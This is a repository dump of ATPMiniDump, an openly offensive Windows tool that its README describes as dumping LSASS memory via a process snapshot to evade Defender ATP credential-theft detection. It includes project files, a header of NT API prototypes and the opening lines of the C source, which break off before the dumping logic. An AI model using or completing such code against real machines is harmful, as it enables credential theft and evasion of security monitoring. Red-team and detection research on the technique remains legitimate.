├── .gitattributes
├── README.md
├── ATPMiniDump
    ├── ATPMiniDump.vcxproj.filters
    ├── ATPMiniDump.h
    ├── ATPMiniDump.vcxproj
    └── ATPMiniDump.c
├── ATPMiniDump.sln
├── LICENSE
└── .gitignore


/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # ATPMiniDump
2 |  Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft.
3 |  Take a look at this [blog post](https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/) for details.
4 |  ATPMiniDump was created starting from [Outflank-Dumpert](https://github.com/outflanknl/Dumpert) then big credits to [@Cneelis](https://twitter.com/Cneelis)
5 | 


--------------------------------------------------------------------------------
/ATPMiniDump/ATPMiniDump.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="File di origine">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="File di intestazione">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="File di risorse">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClInclude Include="ATPMiniDump.h">
19 |       <Filter>File di intestazione</Filter>
20 |     </ClInclude>
21 |   </ItemGroup>
22 |   <ItemGroup>
23 |     <ClCompile Include="ATPMiniDump.c">
24 |       <Filter>File di origine</Filter>
25 |     </ClCompile>
26 |   </ItemGroup>
27 | </Project>


--------------------------------------------------------------------------------
/ATPMiniDump.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.28307.136
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ATPMiniDump", "ATPMiniDump\ATPMiniDump.vcxproj", "{920B8C5B-0DC5-4BD7-B6BB-D14B39BFC9FE}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{920B8C5B-0DC5-4BD7-B6BB-D14B39BFC9FE}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{920B8C5B-0DC5-4BD7-B6BB-D14B39BFC9FE}.Debug|x64.Build.0 = Debug|x64
18 | 		{920B8C5B-0DC5-4BD7-B6BB-D14B39BFC9FE}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{920B8C5B-0DC5-4BD7-B6BB-D14B39BFC9FE}.Debug|x86.Build.0 = Debug|Win32
20 | 		{920B8C5B-0DC5-4BD7-B6BB-D14B39BFC9FE}.Release|x64.ActiveCfg = Release|x64
21 | 		{920B8C5B-0DC5-4BD7-B6BB-D14B39BFC9FE}.Release|x64.Build.0 = Release|x64
22 | 		{920B8C5B-0DC5-4BD7-B6BB-D14B39BFC9FE}.Release|x86.ActiveCfg = Release|Win32
23 | 		{920B8C5B-0DC5-4BD7-B6BB-D14B39BFC9FE}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {12B950FC-22CA-4697-A226-4BFC657367F8}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | BSD 3-Clause License
 2 | 
 3 | Copyright (c) 2019, b4rtik
 4 | All rights reserved.
 5 | 
 6 | Redistribution and use in source and binary forms, with or without
 7 | modification, are permitted provided that the following conditions are met:
 8 | 
 9 | 1. Redistributions of source code must retain the above copyright notice, this
10 |    list of conditions and the following disclaimer.
11 | 
12 | 2. Redistributions in binary form must reproduce the above copyright notice,
13 |    this list of conditions and the following disclaimer in the documentation
14 |    and/or other materials provided with the distribution.
15 | 
16 | 3. Neither the name of the copyright holder nor the names of its
17 |    contributors may be used to endorse or promote products derived from
18 |    this software without specific prior written permission.
19 | 
20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
30 | 


--------------------------------------------------------------------------------
/ATPMiniDump/ATPMiniDump.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | 
  3 | #include <Windows.h>
  4 | #include <winapifamily.h>
  5 | #include <processsnapshot.h>
  6 | #include <Dbghelp.h>
  7 | #include <intrin.h>
  8 | 
  9 | #ifndef _APISETMAP_H_
 10 | #define _APISETMAP_H_
 11 | #endif
 12 | 
 13 | #define DEREF( name )*(UINT_PTR *)(name)
 14 | #define DEREF_64( name )*(DWORD64 *)(name)
 15 | #define DEREF_32( name )*(DWORD *)(name)
 16 | #define DEREF_16( name )*(WORD *)(name)
 17 | #define DEREF_8( name )*(BYTE *)(name)
 18 | 
 19 | #define STATUS_SUCCESS 0
 20 | #define OBJ_CASE_INSENSITIVE 0x00000040L
 21 | #define FILE_OVERWRITE_IF 0x00000005
 22 | #define FILE_SYNCHRONOUS_IO_NONALERT 0x00000020
 23 | typedef LONG KPRIORITY;
 24 | 
 25 | #define InitializeObjectAttributes( i, o, a, r, s ) {    \
 26 |       (i)->Length = sizeof( OBJECT_ATTRIBUTES );         \
 27 |       (i)->RootDirectory = r;                            \
 28 |       (i)->Attributes = a;                               \
 29 |       (i)->ObjectName = o;                               \
 30 |       (i)->SecurityDescriptor = s;                       \
 31 |       (i)->SecurityQualityOfService = NULL;              \
 32 |    }
 33 | 
 34 | 
 35 | typedef struct
 36 | {
 37 | 	WORD	offset : 12;
 38 | 	WORD	type : 4;
 39 | } IMAGE_RELOC, *PIMAGE_RELOC;
 40 | 
 41 | typedef struct _UNICODE_STRING {
 42 | 	USHORT Length;
 43 | 	USHORT MaximumLength;
 44 | 	PWSTR  pBuffer;
 45 | } UNICODE_STRING, *PUNICODE_STRING;
 46 | 
 47 | typedef const UNICODE_STRING* PCUNICODE_STRING;
 48 | 
 49 | typedef struct _WIN_VER_INFO {
 50 | 	WCHAR chOSMajorMinor[8];
 51 | 	DWORD dwBuildNumber;
 52 | 	UNICODE_STRING ProcName;
 53 | 	HANDLE hTargetPID;
 54 | 	LPCSTR lpApiCall;
 55 | 	INT SystemCall;
 56 | } WIN_VER_INFO, *PWIN_VER_INFO;
 57 | 
 58 | typedef struct _OBJECT_ATTRIBUTES {
 59 | 	ULONG Length;
 60 | 	HANDLE RootDirectory;
 61 | 	PUNICODE_STRING ObjectName;
 62 | 	ULONG Attributes;
 63 | 	PVOID SecurityDescriptor;
 64 | 	PVOID SecurityQualityOfService;
 65 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
 66 | 
 67 | typedef struct _CLIENT_ID {
 68 | 	HANDLE UniqueProcess;
 69 | 	HANDLE UniqueThread;
 70 | } CLIENT_ID, *PCLIENT_ID;
 71 | 
 72 | typedef enum _SYSTEM_INFORMATION_CLASS {
 73 | 	SystemBasicInformation,
 74 | 	SystemProcessorInformation,
 75 | 	SystemPerformanceInformation,
 76 | 	SystemTimeOfDayInformation,
 77 | 	SystemPathInformation,
 78 | 	SystemProcessInformation,
 79 | 	SystemCallCountInformation,
 80 | 	SystemDeviceInformation,
 81 | 	SystemProcessorPerformanceInformation,
 82 | 	SystemFlagsInformation,
 83 | 	SystemCallTimeInformation,
 84 | 	SystemModuleInformation
 85 | } SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
 86 | 
 87 | typedef struct _SYSTEM_PROCESSES {
 88 | 	ULONG NextEntryDelta;
 89 | 	ULONG ThreadCount;
 90 | 	ULONG Reserved1[6];
 91 | 	LARGE_INTEGER CreateTime;
 92 | 	LARGE_INTEGER UserTime;
 93 | 	LARGE_INTEGER KernelTime;
 94 | 	UNICODE_STRING ProcessName;
 95 | 	KPRIORITY BasePriority;
 96 | 	HANDLE ProcessId;
 97 | 	HANDLE InheritedFromProcessId;
 98 | } SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;
 99 | 
100 | typedef struct _IO_STATUS_BLOCK
101 | {
102 | 	union
103 | 	{
104 | 		LONG Status;
105 | 		PVOID Pointer;
106 | 	};
107 | 	ULONG Information;
108 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
109 | 
110 | BOOL CALLBACK ATPMiniDumpWriteDumpCallback(
111 | PVOID CallbackParam, const PMINIDUMP_CALLBACK_INPUT CallbackInput,
112 | PMINIDUMP_CALLBACK_OUTPUT CallbackOutput);
113 | 
114 | typedef NTSTATUS(NTAPI *_RtlGetVersion)(
115 | 	LPOSVERSIONINFOEXW lpVersionInformation
116 | 	);
117 | 
118 | typedef void (WINAPI* _RtlInitUnicodeString)(
119 | 	PUNICODE_STRING DestinationString,
120 | 	PCWSTR SourceString
121 | 	);
122 | 
123 | typedef NTSYSAPI BOOLEAN(NTAPI *_RtlEqualUnicodeString)(
124 | 	PUNICODE_STRING String1,
125 | 	PCUNICODE_STRING String2,
126 | 	BOOLEAN CaseInSensitive
127 | 	);
128 | 
129 | typedef NTSYSAPI NTSTATUS(NTAPI *_ZwQuerySystemInformation)(
130 | 	SYSTEM_INFORMATION_CLASS SystemInformationClass,
131 | 	PVOID SystemInformation,
132 | 	ULONG SystemInformationLength,
133 | 	PULONG ReturnLength
134 | 	);
135 | 
136 | typedef NTSYSAPI NTSTATUS(NTAPI *_NtAllocateVirtualMemory)(
137 | 	HANDLE ProcessHandle,
138 | 	PVOID *BaseAddress,
139 | 	ULONG_PTR ZeroBits,
140 | 	PSIZE_T RegionSize,
141 | 	ULONG AllocationType,
142 | 	ULONG Protect
143 | 	);
144 | 
145 | typedef NTSYSAPI NTSTATUS(NTAPI *_NtFreeVirtualMemory)(
146 | 	HANDLE ProcessHandle,
147 | 	PVOID *BaseAddress,
148 | 	IN OUT PSIZE_T RegionSize,
149 | 	ULONG FreeType
150 | 	);
151 | 
152 | typedef NTSYSAPI NTSTATUS(NTAPI *_NtCreateFile)(
153 | 	PHANDLE FileHandle,
154 | 	ACCESS_MASK DesiredAccess,
155 | 	POBJECT_ATTRIBUTES ObjectAttributes,
156 | 	PIO_STATUS_BLOCK IoStatusBlock,
157 | 	PLARGE_INTEGER AllocationSize,
158 | 	ULONG FileAttributes,
159 | 	ULONG ShareAccess,
160 | 	ULONG CreateDisposition,
161 | 	ULONG CreateOptions,
162 | 	PVOID EaBuffer,
163 | 	ULONG EaLength
164 | 	);
165 | 
166 | typedef NTSYSAPI NTSTATUS(NTAPI *_ZwClose)(
167 | 	IN HANDLE KeyHandle
168 | 	);
169 | 
170 | typedef NTSYSAPI NTSTATUS(NTAPI *_ZwOpenProcess)(
171 | 	PHANDLE ProcessHandle,
172 | 	ACCESS_MASK DesiredAccess,
173 | 	POBJECT_ATTRIBUTES ObjectAttributes,
174 | 	PCLIENT_ID ClientId
175 | 	);
176 | 
177 | 
178 | 
179 | 


--------------------------------------------------------------------------------
/ATPMiniDump/ATPMiniDump.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <ProjectGuid>{C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4}</ProjectGuid>
 23 |     <RootNamespace>ATPMiniDump</RootNamespace>
 24 |     <WindowsTargetPlatformVersion>10.0.17763.0</WindowsTargetPlatformVersion>
 25 |     <ProjectName>ATPMiniDump</ProjectName>
 26 |   </PropertyGroup>
 27 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 28 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 29 |     <ConfigurationType>Application</ConfigurationType>
 30 |     <UseDebugLibraries>true</UseDebugLibraries>
 31 |     <PlatformToolset>v141</PlatformToolset>
 32 |     <CharacterSet>MultiByte</CharacterSet>
 33 |   </PropertyGroup>
 34 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 35 |     <ConfigurationType>Application</ConfigurationType>
 36 |     <UseDebugLibraries>false</UseDebugLibraries>
 37 |     <PlatformToolset>v141</PlatformToolset>
 38 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 39 |     <CharacterSet>MultiByte</CharacterSet>
 40 |   </PropertyGroup>
 41 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 42 |     <ConfigurationType>Application</ConfigurationType>
 43 |     <UseDebugLibraries>true</UseDebugLibraries>
 44 |     <PlatformToolset>v141</PlatformToolset>
 45 |     <CharacterSet>MultiByte</CharacterSet>
 46 |   </PropertyGroup>
 47 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 48 |     <ConfigurationType>Application</ConfigurationType>
 49 |     <UseDebugLibraries>false</UseDebugLibraries>
 50 |     <PlatformToolset>v141</PlatformToolset>
 51 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 52 |     <CharacterSet>MultiByte</CharacterSet>
 53 |   </PropertyGroup>
 54 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 55 |   <ImportGroup Label="ExtensionSettings">
 56 |     <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup />
 74 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 75 |     <ClCompile>
 76 |       <WarningLevel>Level3</WarningLevel>
 77 |       <Optimization>Disabled</Optimization>
 78 |       <SDLCheck>true</SDLCheck>
 79 |     </ClCompile>
 80 |   </ItemDefinitionGroup>
 81 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 82 |     <ClCompile>
 83 |       <WarningLevel>Level3</WarningLevel>
 84 |       <Optimization>Disabled</Optimization>
 85 |       <SDLCheck>true</SDLCheck>
 86 |     </ClCompile>
 87 |   </ItemDefinitionGroup>
 88 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 89 |     <ClCompile>
 90 |       <WarningLevel>Level3</WarningLevel>
 91 |       <Optimization>MaxSpeed</Optimization>
 92 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 93 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 94 |       <SDLCheck>true</SDLCheck>
 95 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
 96 |     </ClCompile>
 97 |     <Link>
 98 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
 99 |       <OptimizeReferences>true</OptimizeReferences>
100 |     </Link>
101 |   </ItemDefinitionGroup>
102 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
103 |     <ClCompile>
104 |       <WarningLevel>Level3</WarningLevel>
105 |       <Optimization>MaxSpeed</Optimization>
106 |       <FunctionLevelLinking>true</FunctionLevelLinking>
107 |       <IntrinsicFunctions>true</IntrinsicFunctions>
108 |       <SDLCheck>true</SDLCheck>
109 |       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
110 |     </ClCompile>
111 |     <Link>
112 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
113 |       <OptimizeReferences>true</OptimizeReferences>
114 |       <GenerateDebugInformation>false</GenerateDebugInformation>
115 |     </Link>
116 |   </ItemDefinitionGroup>
117 |   <ItemGroup>
118 |     <ClCompile Include="ATPMiniDump.c" />
119 |   </ItemGroup>
120 |   <ItemGroup>
121 |     <ClInclude Include="ATPMiniDump.h" />
122 |   </ItemGroup>
123 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
124 | </Project>


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | ## Ignore Visual Studio temporary files, build results, and
  2 | ## files generated by popular Visual Studio add-ons.
  3 | ##
  4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
  5 | 
  6 | # User-specific files
  7 | *.rsuser
  8 | *.suo
  9 | *.user
 10 | *.userosscache
 11 | *.sln.docstates
 12 | 
 13 | # User-specific files (MonoDevelop/Xamarin Studio)
 14 | *.userprefs
 15 | 
 16 | # Mono auto generated files
 17 | mono_crash.*
 18 | 
 19 | # Build results
 20 | [Dd]ebug/
 21 | [Dd]ebugPublic/
 22 | [Rr]elease/
 23 | [Rr]eleases/
 24 | x64/
 25 | x86/
 26 | [Aa][Rr][Mm]/
 27 | [Aa][Rr][Mm]64/
 28 | bld/
 29 | [Bb]in/
 30 | [Oo]bj/
 31 | [Ll]og/
 32 | [Ll]ogs/
 33 | 
 34 | # Visual Studio 2015/2017 cache/options directory
 35 | .vs/
 36 | # Uncomment if you have tasks that create the project's static files in wwwroot
 37 | #wwwroot/
 38 | 
 39 | # Visual Studio 2017 auto generated files
 40 | Generated\ Files/
 41 | 
 42 | # MSTest test Results
 43 | [Tt]est[Rr]esult*/
 44 | [Bb]uild[Ll]og.*
 45 | 
 46 | # NUnit
 47 | *.VisualState.xml
 48 | TestResult.xml
 49 | nunit-*.xml
 50 | 
 51 | # Build Results of an ATL Project
 52 | [Dd]ebugPS/
 53 | [Rr]eleasePS/
 54 | dlldata.c
 55 | 
 56 | # Benchmark Results
 57 | BenchmarkDotNet.Artifacts/
 58 | 
 59 | # .NET Core
 60 | project.lock.json
 61 | project.fragment.lock.json
 62 | artifacts/
 63 | 
 64 | # StyleCop
 65 | StyleCopReport.xml
 66 | 
 67 | # Files built by Visual Studio
 68 | *_i.c
 69 | *_p.c
 70 | *_h.h
 71 | *.ilk
 72 | *.meta
 73 | *.obj
 74 | *.iobj
 75 | *.pch
 76 | *.pdb
 77 | *.ipdb
 78 | *.pgc
 79 | *.pgd
 80 | *.rsp
 81 | *.sbr
 82 | *.tlb
 83 | *.tli
 84 | *.tlh
 85 | *.tmp
 86 | *.tmp_proj
 87 | *_wpftmp.csproj
 88 | *.log
 89 | *.vspscc
 90 | *.vssscc
 91 | .builds
 92 | *.pidb
 93 | *.svclog
 94 | *.scc
 95 | 
 96 | # Chutzpah Test files
 97 | _Chutzpah*
 98 | 
 99 | # Visual C++ cache files
100 | ipch/
101 | *.aps
102 | *.ncb
103 | *.opendb
104 | *.opensdf
105 | *.sdf
106 | *.cachefile
107 | *.VC.db
108 | *.VC.VC.opendb
109 | 
110 | # Visual Studio profiler
111 | *.psess
112 | *.vsp
113 | *.vspx
114 | *.sap
115 | 
116 | # Visual Studio Trace Files
117 | *.e2e
118 | 
119 | # TFS 2012 Local Workspace
120 | $tf/
121 | 
122 | # Guidance Automation Toolkit
123 | *.gpState
124 | 
125 | # ReSharper is a .NET coding add-in
126 | _ReSharper*/
127 | *.[Rr]e[Ss]harper
128 | *.DotSettings.user
129 | 
130 | # JustCode is a .NET coding add-in
131 | .JustCode
132 | 
133 | # TeamCity is a build add-in
134 | _TeamCity*
135 | 
136 | # DotCover is a Code Coverage Tool
137 | *.dotCover
138 | 
139 | # AxoCover is a Code Coverage Tool
140 | .axoCover/*
141 | !.axoCover/settings.json
142 | 
143 | # Visual Studio code coverage results
144 | *.coverage
145 | *.coveragexml
146 | 
147 | # NCrunch
148 | _NCrunch_*
149 | .*crunch*.local.xml
150 | nCrunchTemp_*
151 | 
152 | # MightyMoose
153 | *.mm.*
154 | AutoTest.Net/
155 | 
156 | # Web workbench (sass)
157 | .sass-cache/
158 | 
159 | # Installshield output folder
160 | [Ee]xpress/
161 | 
162 | # DocProject is a documentation generator add-in
163 | DocProject/buildhelp/
164 | DocProject/Help/*.HxT
165 | DocProject/Help/*.HxC
166 | DocProject/Help/*.hhc
167 | DocProject/Help/*.hhk
168 | DocProject/Help/*.hhp
169 | DocProject/Help/Html2
170 | DocProject/Help/html
171 | 
172 | # Click-Once directory
173 | publish/
174 | 
175 | # Publish Web Output
176 | *.[Pp]ublish.xml
177 | *.azurePubxml
178 | # Note: Comment the next line if you want to checkin your web deploy settings,
179 | # but database connection strings (with potential passwords) will be unencrypted
180 | *.pubxml
181 | *.publishproj
182 | 
183 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
184 | # checkin your Azure Web App publish settings, but sensitive information contained
185 | # in these scripts will be unencrypted
186 | PublishScripts/
187 | 
188 | # NuGet Packages
189 | *.nupkg
190 | # NuGet Symbol Packages
191 | *.snupkg
192 | # The packages folder can be ignored because of Package Restore
193 | **/[Pp]ackages/*
194 | # except build/, which is used as an MSBuild target.
195 | !**/[Pp]ackages/build/
196 | # Uncomment if necessary however generally it will be regenerated when needed
197 | #!**/[Pp]ackages/repositories.config
198 | # NuGet v3's project.json files produces more ignorable files
199 | *.nuget.props
200 | *.nuget.targets
201 | 
202 | # Microsoft Azure Build Output
203 | csx/
204 | *.build.csdef
205 | 
206 | # Microsoft Azure Emulator
207 | ecf/
208 | rcf/
209 | 
210 | # Windows Store app package directories and files
211 | AppPackages/
212 | BundleArtifacts/
213 | Package.StoreAssociation.xml
214 | _pkginfo.txt
215 | *.appx
216 | *.appxbundle
217 | *.appxupload
218 | 
219 | # Visual Studio cache files
220 | # files ending in .cache can be ignored
221 | *.[Cc]ache
222 | # but keep track of directories ending in .cache
223 | !?*.[Cc]ache/
224 | 
225 | # Others
226 | ClientBin/
227 | ~$*
228 | *~
229 | *.dbmdl
230 | *.dbproj.schemaview
231 | *.jfm
232 | *.pfx
233 | *.publishsettings
234 | orleans.codegen.cs
235 | 
236 | # Including strong name files can present a security risk
237 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
238 | #*.snk
239 | 
240 | # Since there are multiple workflows, uncomment next line to ignore bower_components
241 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
242 | #bower_components/
243 | 
244 | # RIA/Silverlight projects
245 | Generated_Code/
246 | 
247 | # Backup & report files from converting an old project file
248 | # to a newer Visual Studio version. Backup files are not needed,
249 | # because we have git ;-)
250 | _UpgradeReport_Files/
251 | Backup*/
252 | UpgradeLog*.XML
253 | UpgradeLog*.htm
254 | ServiceFabricBackup/
255 | *.rptproj.bak
256 | 
257 | # SQL Server files
258 | *.mdf
259 | *.ldf
260 | *.ndf
261 | 
262 | # Business Intelligence projects
263 | *.rdl.data
264 | *.bim.layout
265 | *.bim_*.settings
266 | *.rptproj.rsuser
267 | *- [Bb]ackup.rdl
268 | *- [Bb]ackup ([0-9]).rdl
269 | *- [Bb]ackup ([0-9][0-9]).rdl
270 | 
271 | # Microsoft Fakes
272 | FakesAssemblies/
273 | 
274 | # GhostDoc plugin setting file
275 | *.GhostDoc.xml
276 | 
277 | # Node.js Tools for Visual Studio
278 | .ntvs_analysis.dat
279 | node_modules/
280 | 
281 | # Visual Studio 6 build log
282 | *.plg
283 | 
284 | # Visual Studio 6 workspace options file
285 | *.opt
286 | 
287 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
288 | *.vbw
289 | 
290 | # Visual Studio LightSwitch build output
291 | **/*.HTMLClient/GeneratedArtifacts
292 | **/*.DesktopClient/GeneratedArtifacts
293 | **/*.DesktopClient/ModelManifest.xml
294 | **/*.Server/GeneratedArtifacts
295 | **/*.Server/ModelManifest.xml
296 | _Pvt_Extensions
297 | 
298 | # Paket dependency manager
299 | .paket/paket.exe
300 | paket-files/
301 | 
302 | # FAKE - F# Make
303 | .fake/
304 | 
305 | # CodeRush personal settings
306 | .cr/personal
307 | 
308 | # Python Tools for Visual Studio (PTVS)
309 | __pycache__/
310 | *.pyc
311 | 
312 | # Cake - Uncomment if you are using it
313 | # tools/**
314 | # !tools/packages.config
315 | 
316 | # Tabs Studio
317 | *.tss
318 | 
319 | # Telerik's JustMock configuration file
320 | *.jmconfig
321 | 
322 | # BizTalk build output
323 | *.btp.cs
324 | *.btm.cs
325 | *.odx.cs
326 | *.xsd.cs
327 | 
328 | # OpenCover UI analysis results
329 | OpenCover/
330 | 
331 | # Azure Stream Analytics local run output
332 | ASALocalRun/
333 | 
334 | # MSBuild Binary and Structured Log
335 | *.binlog
336 | 
337 | # NVidia Nsight GPU debugger configuration file
338 | *.nvuser
339 | 
340 | # MFractors (Xamarin productivity tool) working folder
341 | .mfractor/
342 | 
343 | # Local History for Visual Studio
344 | .localhistory/
345 | 
346 | # BeatPulse healthcheck temp database
347 | healthchecksdb
348 | 
349 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
350 | MigrationBackup/
351 | 
352 | # Ionide (cross platform F# VS Code tools) working folder
353 | .ionide/
354 | 


--------------------------------------------------------------------------------
/ATPMiniDump/ATPMiniDump.c:
--------------------------------------------------------------------------------
  1 | #undef  _UNICODE
  2 | #define _UNICODE
  3 | #undef  UNICODE
  4 | #define UNICODE
  5 | 
  6 | #include <Windows.h>
  7 | #include <stdio.h>
  8 | 
  9 | #include <intrin.h>
 10 | 
 11 | #include "ATPMiniDump.h"
 12 | #include <DbgHelp.h>
 13 | 
 14 | #pragma comment (lib, "Dbghelp.lib")
 15 | 
 16 | BOOL GetPID(IN PWIN_VER_INFO pWinVerInfo) {
 17 | 	pWinVerInfo->hTargetPID = NULL;
 18 | 
 19 | 	_ZwQuerySystemInformation ZwQuerySystemInformation = (_ZwQuerySystemInformation)
 20 | 		GetProcAddress(GetModuleHandle(L"ntdll.dll"), "ZwQuerySystemInformation");
 21 | 	if (ZwQuerySystemInformation == NULL) {
 22 | 		return FALSE;
 23 | 	}
